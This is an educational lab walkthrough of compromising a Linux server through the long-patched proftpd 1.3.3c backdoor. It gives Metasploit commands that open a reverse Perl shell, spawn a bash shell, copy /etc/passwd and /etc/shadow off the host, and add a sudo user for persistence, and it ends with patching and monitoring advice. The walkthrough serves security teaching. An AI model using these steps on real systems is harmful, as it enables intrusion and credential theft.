Computer systems get attacked daily. Ransomware, malware, stolen credentials, video game makers’ source code gets leaked, and money drained from users’ accounts dominate our news feeds. But how do hackers gain initial access to compromise a system? Let’s take a look at how a breach could happen.
Don’t get too excited. This Behind the Scenes (BTS) walkthrough is using an old, patched, well-documented vulnerability that was fixed shortly after it was discovered, but it serves as a great example showing how Linux servers are exploited if you don’t keep them patched and up-to-date.
We’ll go through the steps threat actors use to infiltrate a system:
- Reconnaissance
- Scanning
- Obtaining Access
- Exfilitrating data
- Maintaining Persistence
- Pivoting
Lab Environment
The local home lab provides everything we need for this walkthrough.
- Vulnerable Linux Machine - Ubuntu 16.04
- proftpd 1.3.3c
- Apache HTTP
- OpenSSH
- Attacking Machine - Ubuntu Server 22.04
- Nmap
- Metasploit
These tools are widely used by penetration testers, network administrators, and threat actors alike. The first tool is Nmap, short for Network Mapper. For network admins, Nmap helps to find networked computers, discover open ports, available services, and detect known vulnerabilities on their network. Once a list of services is discovered, they can be exploited.
Scanning with Nmap
This is part of the reconnaissance or scanning phase where the threat actor wants to learn as much about the target system as they can. Because this is a demonstration we are not going to be quiet about our attack and will do nothing to conceal our intentions. We will use -sV option that tells us the current version of any services that are running. This is a noisy attack that should be picked up by most intrusion detection systems or SIEMs.
$ nmap -sV 10.10.10.172
The results from this command reveal a lot about our target system. Each open port is vulnerable to a potential attack. In our simulated attack, we are going to concentrate on the ftp service running the proftpd 1.3.3c software on Port 21.
|
Port |
Protocol |
State |
Service |
Version |
|---|---|---|---|---|
|
21 |
tcp |
open |
ftp |
proftpd 1.3.3c |
|
22 |
tcp |
open |
ssh |
OpenSSH 7.2p2 |
|
80 |
tcp |
open |
http |
Apache 2.4.18 |
The proftpd 1.3.3c software was patched over 10 years ago but serves as a good example of how a vulnerable piece of software can be exploited. It is highly unlikely to still be running as an unpatched service.
Researching Vulnerabilities
We could use Google to learn more about the vulnerabilities in the proftpd 1.3.3c server, or we can use the next tool in our toolbox, Metasploit, and use its built-in database to find known vulnerabilities.
Metasploit is an open-source penetration testing framework that helps network administrators, and security professionals discover vulnerabilities in their systems before exploitation by hackers. Complete with various tools, libraries, user interfaces, and modules, Metasploit allows a user to research, configure a payload, point it at a target, and launch an attack. Metasploit’s extensive database contains hundreds of exploits and payloads. Unfortunately, Metasploit is also widely used by threat actors.
Launching Metasploit
Find installation instructions for Metasploit in the documentation and start the Metasploit framework as root with the following command.
$ sudo msfconsole
Search the Database for Known Exploits
Metasploit comes with an extensive database and technical details of over 180,000 vulnerabilites and 4000 exploits. These are all searchable with the search command from the Metasploit command line. We are going to use this database to find proftpd 1.3.3c vulnerabilities and known exploits.
msf6> search proftpd 1.3.3c
The results of the search command reveal that there is a backdoor command execution exploit. This is what we are going to use to gain access to the Linux server.
Gaining System Access
Let’s begin initial access to the server by configuring our attack by typing use exploit/unix/ftp/proftpd_133c_backdoor or simply the module ID number, use 0.
msf6 > use exploit/unix/ftp/proftpd_133c_backdoor
Use the show payloads command to display the payloads available for the proftpd_133c_backdoor module.
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > show payloads
From the available payloads for the proftpd_133c_backdoor exploit, we are interested in Option 5, the payload/cmd/unix/reverse_perl command. Set the option using the payload number or the full command as follows:
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set PAYLOAD cmd/unix/reverse_perl
Now we need to make some site-specific configuration settings. The first is the IP address of the target machine. Set the remote host IP address with the RHOSTS command. This is the same IP address we used during our Nmap scan earlier and the machine that is running the proftpd_1.3.3c server.
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set RHOSTS 10.10.10.172
The local IP address is the computer that we are using for this attack. In our case, the LHOST is 10.10.10.171.
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set LHOST 10.10.10.171
The Metasploit configuration is complete. Run the exploit with the exploit command.
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > exploit
This exploit takes a few seconds to run. When you see ‘Command shell session 1 opened’ you can issue Linux commands by typing a command name. In our example, entering the whoami command displays the current user, which is root. This is a big deal! Root is the superuser account in UNIX, has administrative purposes, and typically has the highest access rights on the system.
At this point, the system is compromised and you can do whatever you want.
Gaining a Shell
To have any real fun on our compromised system we are going to want a full Linux shell. The following python command spawns a bash shell.
python3 -c 'import pty; pty.spawn("/bin/bash")'
Once we have a proper shell we can move through the system as root, having full access to the Linux environment. This is where the system is most vulnerable. As root we can install rootkits, malware, ransomware, and exfiltrate data.
Data Exfiltration
Data exfiltration is when a threat actor performs the unauthorized copying, transfer, or retrieval of data from a computer or server. As root, we have full access to the computer and can do anything we want including data exfiltration.
The Linux /etc/password file contains a list of system users, combined with the /etc/shadow file which contains encrypted passwords. Together these two files can be hacked to reveal username/password combinations for lateral movement through the network.
Again, we don’t really care about protecting our identity or our intentions (a SIEM would flag this immediately) so we are going to use scp (secure copy) to copy the password and shadow files to our remote server.
And /etc/shadow
We exfiltrated /etc/passwd and /etc/shadow to our local machine. There is no reason that we could not also exfiltrate databases, customer information, stored credit cards, or company-sensitive information out of the network to a remote location as we did with the password files.
Usernames and Passwords
Cracking the hashed passwords is beyond the scope of this walkthrough, but if you can crack the passwords, an attacker can use the same credentials to pivot to other machines across the network. John the Ripper and Hashcat are two well-known password cracking tools that can quickly reveal username/password combinations.
Maintaining Persistence
Persistence in cybersecurity occurs when a threat actor discreetly maintains long-term access to systems despite disruptions such as restarts or changed credentials. As root user, we can perform any administrative task we want, including adding users. One of the ways to maintain persistence is by adding a new user so the threat actor can gain access at a later time. Let’s add a new user.
root@vtsec:/# adduser badguy
And give them superuser access.
root@vtsec:/# usermod -aG sudo badguy
In the Sophos Active Adversary Playbook for 2021, “The median time that attackers were able to remain in the target network before detection – dwell time – was 11 days. This provides attackers with approximately 264 hours for malicious activity, such as lateral movement, reconnaissance, credential dumping, data exfiltration, and more.” Becoming a user of the system is one of the ways they can maintain persistence during this dwell time.
How to Protect Your Network
This type of attack would be caught by Antivirus (AV), Data Loss Prevention (DLP), and other SIEM solutions to control intrusions and data exfiltration. These are all basic cyber security tools that are part of a company’s overall security strategy that focuses on detecting and preventing the loss, leakage, or misuse of data through breaches, exfiltration, and unauthorized use.
Although it’s unlikely to find the proftpd 1.3.3c vulnerability because it was patched a long time ago, protecting your servers from this type of attack is the first step to protecting them. Update your software and perform routine patch management for all of your services.